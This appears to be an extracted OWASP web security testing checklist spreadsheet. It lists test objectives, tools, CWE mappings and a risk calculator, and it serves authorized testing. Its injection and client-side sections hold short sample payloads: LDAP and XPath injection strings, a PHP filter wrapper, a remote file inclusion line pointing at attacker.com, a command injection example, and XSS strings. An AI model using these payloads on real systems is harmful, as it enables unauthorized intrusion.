OWASP WSTG Checklist
1. Information Gathering
1.10 WSTG-INFO-10
Symbol: Pass / Issue / N/A
Objectives
- Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services).
- Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.
- Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, <META> tag, sitemap.xml).
- Extract and map other information that could lead to a better understanding of the systems at hand.
- Enumerate the applications within the scope that exist on a web server.
- Find applications hosted on the web server (virtual hosts/subdomains), non-standard ports, DNS zone transfers.
- Review webpage comments, metadata, and redirect bodies to find any information leakage.
- Gather JavaScript files and review the JS code to better understand the application and to find any information leakage.
- Identify if source map files or other front-end debug files exist.
- Identify possible entry and injection points through request and response analysis, which covers hidden fields, parameters, methods and HTTP header analysis.
- Map the target application and understand the principal workflows.
- Use the HTTP(S) proxy spider/crawler feature aligned with an application walkthrough.
- Fingerprint the components being used by the web applications.
- Find the type of web application framework/CMS from HTTP headers, cookies, source code, specific files and folders, error messages.
N/A, this content has been merged into: WSTG-INFO-08
- Understand the architecture of the application and the technologies in use.
- Identify the application architecture across application and network components:
  Application: web server, CMS, PaaS, serverless, microservices, static storage, third-party services/APIs
  Network and security: reverse proxy, IPS, WAF
Tools / OWASP Top 10 / CWE / Status (one row per test, in checklist order, as recovered from the extracted column layout; the Result and Affected Item columns are empty):
- Google Hacking, Shodan, Recon-ng | NA | NA | Not started
- Wappalyzer, Nikto | A5, A6 | CWE-756, CWE-1352 | Not started
- Browser, Curl, Burpsuite/ZAP | A1 | CWE-200 | Not started
- dnsrecon, Nmap | NA | NA | Not started
- Browser, Curl, Burpsuite/ZAP | A1 | CWE-200, CWE-540 | Not started
- OWASP ASD, Burpsuite/ZAP | NA | NA | Not started
- Burpsuite/ZAP | NA | NA | Not started
- Whatweb, Wappalyzer, CMSMap | A5, A6 | CWE-756, CWE-1104 | Not started
- NA | NA | NA | Not started
- WAFW00F, Nmap | NA | NA | Not started
2. Configuration and Deploy Management Testing
2.1 WSTG-CONF-01
2.2 WSTG-CONF-02
Description (tools listed after each group):
- Review the applications' configurations set across the network and validate that they are not vulnerable.
- Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials.
  Tools: Nessus, Nmap
- Ensure that defaults and known files have been removed.
- Review configuration and server handling (40*, 50*).
- Validate that no debugging code or extensions are left in the production environments.
- Review the logging mechanisms set in place for the application, including log location, log storage, log rotation, log access control, log review.
  Tools: Browser, Nikto, CIS Benchmarks
- Dirbust sensitive file extensions, or extensions that might contain raw data (*e.g.* scripts, raw data, credentials, etc.).
- Find important files and information (.asa, .inc, .sql, zip, tar, pdf, txt, etc.).
- Validate that no system framework bypasses exist on the rules set.
  Tools: Browser, Nikto, DirSearch, ffuf
- Find and analyse unreferenced files that might contain sensitive information.
- Check JS source code, comments, cache files, backup files (.old, .bak, .inc, .src) and guessing of filenames.
  Tools: Browser, Nikto, DirSearch, ffuf
OWASP Top 10 / CWE / Status (one row per test, in checklist order, as recovered from the extracted column layout):
- A1, A5, A6 | CWE-284, CWE-1349, CWE-1352, CWE-13 | Not started
- A1, A5, A9 | CWE-117, CWE-223, CWE-200, CWE-201, CWE-489, CWE-532, CWE-548, CWE-651, CWE-778 | Not started
- A1 | CWE-200, CWE-425, CWE-552 | Not started
- A1 | CWE-200, CWE-531, CWE-538 | Not started
- A1, A4 | CWE-284, CWE-419 | Not started
- A5 | CWE-650, CWE-749 | Not started
- A1, A5 | CWE-552, CWE-732 | Not started
3.5 WSTG-IDNT-05
Description (tools listed after each group):
- Identify and document roles used by the application.
- Attempt to switch, change, or access another role.
- Review the granularity of the roles and the needs behind the permissions given.
  Tools: Burpsuite/ZAP
- Verify that the identity requirements for user registration are aligned with business and security requirements.
- Validate the registration process.
  Tools: Burpsuite/ZAP
- Verify which accounts may provision other accounts and of what type.
  Tools: Burpsuite/ZAP
- Review processes that pertain to user identification (*e.g.* registration, login, etc.).
- Enumerate users where possible through response analysis.
  Tools: Burpsuite/ZAP
- Determine whether a consistent account name structure renders the application vulnerable to account enumeration.
- User account names are often highly structured (e.g. Joe Bloggs' account name is jbloggs and Fred Nurks' account name is fnurks) and valid account names can easily be guessed.
- Determine whether the application's error messages permit account enumeration.
  Tools: Burpsuite/ZAP
OWASP Top 10 / CWE / Status (one row per test, in checklist order, as recovered from the extracted column layout; the Result and Affected Item columns are empty):
- A4 | CWE-266, CWE-269 | Not started
- A4 | CWE-269, CWE-280 | Not started
4.2 WSTG-ATHN-02
4.3 WSTG-ATHN-03
4.4 WSTG-ATHN-04
4.6 WSTG-ATHN-06
4.7 WSTG-ATHN-07
Description:
N/A, this content has been merged into: WSTG-CRYP-03
- Determine whether the application has any user accounts with default passwords.
- Evaluate the account lockout mechanism's ability to mitigate brute force password guessing.
- Evaluate the unlock mechanism's resistance to unauthorized account unlocking.
- Ensure that authentication is applied across all services that require it.
- Force browsing (/admin/main.php, /page.asp?authenticated=yes), parameter modification, session ID prediction, SQL injection.
- Validate that the generated session is managed securely and does not put the user's credentials in danger (e.g., cookie).
- Verify that the credentials are not stored in clear text, but are hashed. autocomplete=off?
- Review if the application stores sensitive information on the client-side.
- Review if access can occur without authorization.
- Check the browser history issue by clicking the "Back" button after logging out.
- Check the browser cache issue from HTTP response headers (Cache-Control: no-cache).
- Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse, and aging requirements of passwords.
- Review whether new user accounts are created with weak or predictable passwords.
- Determine the complexity and how straightforward the questions are (weak pre-generated questions, weak self-generated questions).
- Assess possible user answers and brute force capabilities.
- Determine whether the password change and reset functionality allows accounts to be compromised.
- Test password reset (display old password in plain text? send via email? random token on confirmation email?).
- Test password change (need old password?).
Tools / OWASP Top 10 / CWE / Status (one row per test, in checklist order, as recovered from the extracted column layout):
- NA | NA | NA | Not started
- Browser, Burpsuite/ZAP, Hydra | A7 | CWE-1392 | Not started
- Browser, Burpsuite/ZAP, Hydra | A7 | CWE-307 | Not started
- Burpsuite/ZAP | A1, A7 | CWE-287, CWE-288, CWE-290, CWE-294, CWE-302, CWE-304, CWE-306, CWE-425, CWE-804 | Not started
- Burpsuite/ZAP | A4, A5 | CWE-315, CWE-522, CWE-524 | Not started
- Browser, Burpsuite/ZAP | A4 | CWE-525 | Not started
- Burpsuite/ZAP, Hydra | A7 | CWE-521, CWE-1391 | Not started
- Browser, Burpsuite/ZAP | A7 | CWE-640 | Not started
- Browser, Burpsuite/ZAP | A7 | CWE-620, CWE-640 | Not started
- Browser, Burpsuite/ZAP | A7 | CWE-288 | Not started
- Browser, Burpsuite/ZAP | A7 | CWE-288, CWE-304, CWE-308 | Not started
5. Authorization Testing
5.1 WSTG-ATHZ-01
5.2 WSTG-ATHZ-02
5.3 WSTG-ATHZ-03
Description (tools and OWASP Top 10 listed after the group):
- Identify injection points that pertain to path traversal.
- Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, local/remote file inclusion).
  Tools: Burpsuite/ZAP; OWASP Top 10: A1
CWE / Status (one row per test, in checklist order, as recovered from the extracted column layout):
- CWE-22, CWE-23, CWE-35, CWE-829 | Not started
- CWE-285, CWE-732, CWE-862, CWE-863 | Not started
- CWE-269, CWE-639 | Not started
- CWE-290, CWE-345, CWE-798 | Not started
6. Session Management Testing
6.1 WSTG-SESS-01
6.2 WSTG-SESS-02
6.3 WSTG-SESS-03
6.4 WSTG-SESS-04
6.8 WSTG-SESS-08
Description (tools listed after each group):
- Gather session tokens, for the same user and for different users where possible.
- Analyze and ensure that enough randomness exists to stop session forging attacks.
- Modify cookies that are not signed and contain information that can be manipulated.
  Tools: Burpsuite/ZAP
- Ensure that the proper security configuration is set for cookies (HttpOnly and Secure flags, SameSite=Strict).
  Tools: Burpsuite/ZAP
- Ensure that proper encryption is implemented (encryption and reuse of session token vulnerabilities).
- Review the caching configuration.
- Assess the channel and methods' security (send session ID with GET method?).
  Tools: Burpsuite/ZAP
- Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user.
- Conduct URL analysis, direct access to functions without any token.
  Tools: Burpsuite/ZAP
- Assess the logout UI.
- Analyze the session timeout and whether the session is properly killed after logout.
  Tools: Burpsuite/ZAP
- Validate that a hard session timeout exists; after the timeout has passed, all session tokens should be destroyed or be unusable.
  Tools: Burpsuite/ZAP
- Identify all session variables.
- Break the logical flow of session generation.
- Check whether the application uses the same session variable for more than one purpose.
  Tools: Burpsuite/ZAP
OWASP Top 10 / CWE / Status (one row per test, in checklist order, as recovered from the extracted column layout):
- A2, A4 | CWE-315, CWE-330, CWE-539, CWE-694 | Not started
- A5 | CWE-16, CWE-614, CWE-1004, CWE-1275 | Not started
- A7 | CWE-345, CWE-757, CWE-798 | Not started
7. Data Validation Testing
7.6 WSTG-INPV-06
7.7 WSTG-INPV-07
7.8 WSTG-INPV-08
7.9 WSTG-INPV-09
7.10 WSTG-INPV-10
7.11 WSTG-INPV-11
7.13 WSTG-INPV-13
7.14 WSTG-INPV-14
7.15 WSTG-INPV-15
7.16 WSTG-INPV-16
Description (tools listed after each group):
- Identify variables that are reflected in responses.
- Assess the input they accept and the encoding that gets applied on return (if any).
  Tools: Burpsuite/ZAP
- Identify stored input that is reflected on the client-side.
- Assess the input they accept and the encoding that gets applied on return (if any).
  Tools: Burpsuite/ZAP
N/A, this content has been merged into: WSTG-CONF-06
  Tools: NA
- Identify the backend and the parsing method used.
- Assess injection points and try bypassing input filters using HPP.
  Tools: Burpsuite/ZAP
- Identify SQL injection points.
- Assess the severity of the injection and the level of access that can be achieved through it.
  Tools: Burpsuite/ZAP, SQLMap, NoSQLMap
- Identify LDAP injection points:
  /ldapsearch?user=*
  user=*user=*)(uid=*))(|(uid=*
  pass=password
- Assess the severity of the injection.
  Tools: Burpsuite/ZAP
- Identify SSI injection points (presence of the .shtml extension) with these characters:
  < ! # = / . " - > and [a-zA-Z0-9]
- Assess the severity of the injection.
  Tools: Burpsuite/ZAP
- Identify XPath injection points by checking for XML error enumeration by supplying a single quote ('):
  Username: ' or '1' = '1
  Password: ' or '1' = '1
  Tools: Burpsuite/ZAP
- Identify IMAP/SMTP injection points (header, body, footer) with special characters (i.e.: \, ', ", @, #, !, |).
- Understand the data flow and deployment structure of the system.
- Assess the injection impacts.
  Tools: Burpsuite/ZAP
- Identify injection points where you can inject code into the application.
- Check LFI with dot-dot-slash (../../), PHP wrapper (php://filter/convert.base64-encode/resource).
- Check RFI from a malicious URL: ?page.php?file=http://attacker.com/malicious_page
- Assess the injection severity.
  Tools: Burpsuite/ZAP, Liffy, LFImap
- Identify and assess the command injection points with special characters (i.e.: | ; & $ > < ' !). For example: ?doc=Doc1.pdf+|+Dir c:\
  Tools: Burpsuite/ZAP, Commix
- Assess whether injecting format string conversion specifiers into user-controlled fields causes undesired behavior from the application.
  Tools: Immunity Canvas, Spike, MSF
- Identify injections that are stored and require a recall step to the stored injection (i.e.: CSV injection, blind stored XSS, file upload).
- Understand how a recall step could occur.
- Set listeners or activate the recall step if possible.
  Tools: Burpsuite/ZAP, BeEF
- Assess if the application is vulnerable to splitting, identifying what possible attacks are achievable.
- Assess if the chain of communication is vulnerable to smuggling, identifying what possible attacks are achievable.
  Tools: Burpsuite/ZAP
- Monitor all incoming and outgoing HTTP requests to the web server to inspect any suspicious requests.
- Monitor HTTP traffic without changes to the end user's browser proxy or client-side application.
  Tools: Burpsuite/ZAP
- Assess if the Host header is being parsed dynamically in the application.
- Bypass security controls that rely on the header.
  Tools: Burpsuite/ZAP, Netcat
- Detect template injection vulnerability points.
- Identify the templating engine.
- Build the exploit.
  Tools: Burpsuite/ZAP, Tplmap
- Identify SSRF injection points.
- Test if the injection points are exploitable.
- Assess the severity of the vulnerability.
  Tools: Burpsuite/ZAP
- Identify requests that modify objects.
- Assess if it is possible to modify fields never intended to be modified from outside.
  Tools: Burpsuite/ZAP
OWASP Top 10 / CWE / Status (one row per test, in checklist order, as recovered from the extracted column layout; the Result and Affected Item columns are empty):
- A5 | CWE-91, CWE-611, CWE-652 | Not started
- A3 | CWE-91, CWE-643 | Not started
- A3 | CWE-22, CWE-94, CWE-95, CWE-98, CWE-829 | Not started
- A3 | CWE-77, CWE-78 | Not started
- A3 | CWE-134 | Not started
- A3 | CWE-79, CWE-434, CWE-1236 | Not started
- A3, A4 | CWE-93, CWE-113, CWE-444 | Not started
- NA | NA | Not started
- A4 | CWE-74, CWE-116 | Not started
8.1 WSTG-ERRH-01
Description:
- Identify existing error output (i.e.: random files/folders (40x)).
- Analyze the different output returned.
OWASP Top 10 / CWE / Status (one row per test, in checklist order, as recovered from the extracted column layout; the Tools column was extracted as NA and the Result and Affected Item columns are empty):
- A5 | CWE-209, CWE-210, CWE-431, CWE-497, CWE-544, CWE-550, CWE-728 | Not started
- NA | NA | Not started
9. Cryptography
9.1 WSTG-CRYP-01
9.3 WSTG-CRYP-03
Testing for Weak Encryption
9.4 WSTG-CRYP-04
Description (tools listed after the group):
- Validate the server configuration (identify weak ciphers/protocols, e.g. RC4, BEAST, CRIME, POODLE).
- Review the digital certificate's cryptographic strength and validity.
- Ensure that the TLS security is not bypassable and is properly implemented across the application.
  Tools: testssl.sh
OWASP Top 10 column values as extracted: A2, A7, A2
CWE / Status (one row per test, in checklist order, as recovered from the extracted column layout; the Result and Affected Item columns are empty):
- CWE-295, CWE-296, CWE-297, CWE-298, CWE-319, CWE-326, CWE-327, CWE-310, CWE-757 | Not started
- CWE-326, CWE-649 | Not started
- CWE-311, CWE-319, CWE-523 | Not started
- CWE-261, CWE-320, CWE-321, CWE-322, CWE-323, CWE-324, CWE-325, CWE-326, CWE-327, CWE-328, CWE-329, CWE-330, CWE-331, CWE-335, CWE-336, CWE-337, CWE-338, CWE-340, CWE-347, CWE-354, CWE-759, CWE-760, CWE-780, CWE-798, CWE-916 | Not started
10. Business logic Testing
10.1 WSTG-BUSL-01
10.3 WSTG-BUSL-03
10.4 WSTG-BUSL-04
10.5 WSTG-BUSL-05
10.7 WSTG-BUSL-07
Test Upload of Unexpected File Types
10.8 WSTG-BUSL-08
10.9 WSTG-BUSL-09
10.10 WSTG-BUSL-10
Description (tools listed after each group):
- Identify data injection points.
- Validate that all checks are occurring on the back end and can't be bypassed.
- Attempt to break the format of the expected data and analyze how the application is handling it.
  Tools: Burpsuite/ZAP
- Review the project documentation looking for guessable, predictable, or hidden functionality of fields.
- Insert logically valid data in order to bypass the normal business logic workflow.
  Tools: Burpsuite/ZAP
- Review the project documentation for components of the system that move, store, or handle data.
- Determine what type of data is logically acceptable by the component and what types the system should guard against.
- Determine who should be allowed to modify or read that data in each component.
- Attempt to insert, update, or delete data values used by each component that should not be allowed per the business logic workflow.
  Tools: Burp Proxy
- Review the project documentation for system functionality that may be impacted by time, such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time.
- Develop and execute the misuse cases, ensuring that attackers cannot gain an advantage based on any timing (race condition).
  Tools: Burpsuite/ZAP
- Identify functions that must set limits to the times they can be called.
- Assess if there is a logical limit set on the functions and if it is properly validated.
- For each of the functions and features found that should only be executed a single time or a specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute them more than the allowable number of times.
  Tools: Burpsuite/ZAP
- Review the project documentation for methods to skip or go through steps in the application process in a different order from the intended business logic flow.
- Develop a misuse case and try to circumvent every logic flow identified.
  Tools: Burpsuite/ZAP
- Generate notes from all tests conducted against the system.
- Review which tests had a different functionality based on aggressive input.
- Understand the defenses in place and verify if they are enough to protect the system against bypassing techniques.
- Measures that might indicate the application has in-built self-defense:
  • Changed responses
  • Blocked requests
  • Actions that log a user out or lock their account
  Tools: Burpsuite/ZAP
- Review the project documentation for file types that are rejected by the system.
- Verify that the unwelcome file types are rejected and handled safely. Also, check whether the website only checks the "Content-Type" header or the file extension.
- Verify that file batch uploads are secure and do not allow any bypass against the set security measures.
  Tools: Burpsuite/ZAP
- Determine whether the business logic for the e-commerce functionality is robust.
- Understand how the payment functionality works.
- Determine whether the payment functionality is secure.
  Tools: Burpsuite/ZAP
OWASP Top 10 / CWE / Status (one row per test, in checklist order, as recovered from the extracted column layout; the Result and Affected Item columns are empty):
- A4 | CWE-840, CWE-472 | Not started
- A4 | CWE-840, CWE-362 | Not started
- A4, A7 | CWE-799 | Not started
- A4 | CWE-472, CWE-602, CWE-807 | Not started
11. Client Side Testing
11.4 WSTG-CLNT-04
11.9 WSTG-CLNT-09
Testing WebSockets
11.10 WSTG-CLNT-10
11.12 WSTG-CLNT-12
Description (tools and OWASP Top 10 listed after each group):
- Identify DOM sinks.
- Build payloads that pertain to every sink type. For example: #<script>alert('xss')</script>
  Tools: Burpsuite/ZAP; OWASP Top 10: A3
- Identify sinks and possible JavaScript injection points. For example: ?javascript:alert(1)
  Tools: Burpsuite/ZAP; OWASP Top 10: A3
- Identify HTML injection points and assess the severity of the injected content. For example: page.html?user=<img%20src='aaa'%20onerror=alert(1)>
  Tools: Burpsuite/ZAP; OWASP Top 10: A3
- Identify injection points that handle URLs or paths.
- Assess the locations that the system could redirect to (open redirect). For example: ?redirect=www.fake-target.site
  Tools: Burpsuite/ZAP; OWASP Top 10: A4
CWE / Status (one row per test, in checklist order, as recovered from the extracted column layout):
- CWE-319, CWE-1347 | Not started
- CWE-312, CWE-313, CWE-315, CWE-922 | Not started
Definition
Symbol: meaning
Pass: Requirement is applicable to the mobile App and implemented according to best practices.
Issue: Requirement is applicable to the mobile App but not fulfilled.
N/A: Requirement is not applicable to the mobile App.
Description (tools listed after the group):
- Assess that a secure and production-ready configuration is deployed.
- Validate all input fields against generic attacks.
- Ensure that proper access controls are applied.
  Tools: Burpsuite/ZAP, GraphQL Raider
OWASP Top 10 / CWE / Result / Affected Item / Status: no values recorded.
Findings summary (template)
Test category values as extracted: WSTG - Cryptography; WSTG - Business logic Testing
Columns as extracted: OWASP Top 10 Mapping | Likelihood | Impact | Observation and Implication | Recommendation | Test Evidence
Sample row as extracted: 1 | WSTG-INFO-001 | High | Moderate | High (remaining cells empty)
OWASP Risk Assessment Calculator
Likelihood factors
Threat Agent Factors
- Skills required: Some technical skills [3], score 3
- Motive: Possible reward [4], score 4
- Opportunity: Special access or resources required [4], score 4
- Population Size: Partners [5], score 5
Vulnerability Factors
- Ease of Discovery: Automated tools available [9], score 9
- Ease of Exploit: Automated tools available [9], score 9
- Awareness: Hidden [4], score 4
- Intrusion Detection: Logged without review [8], score 8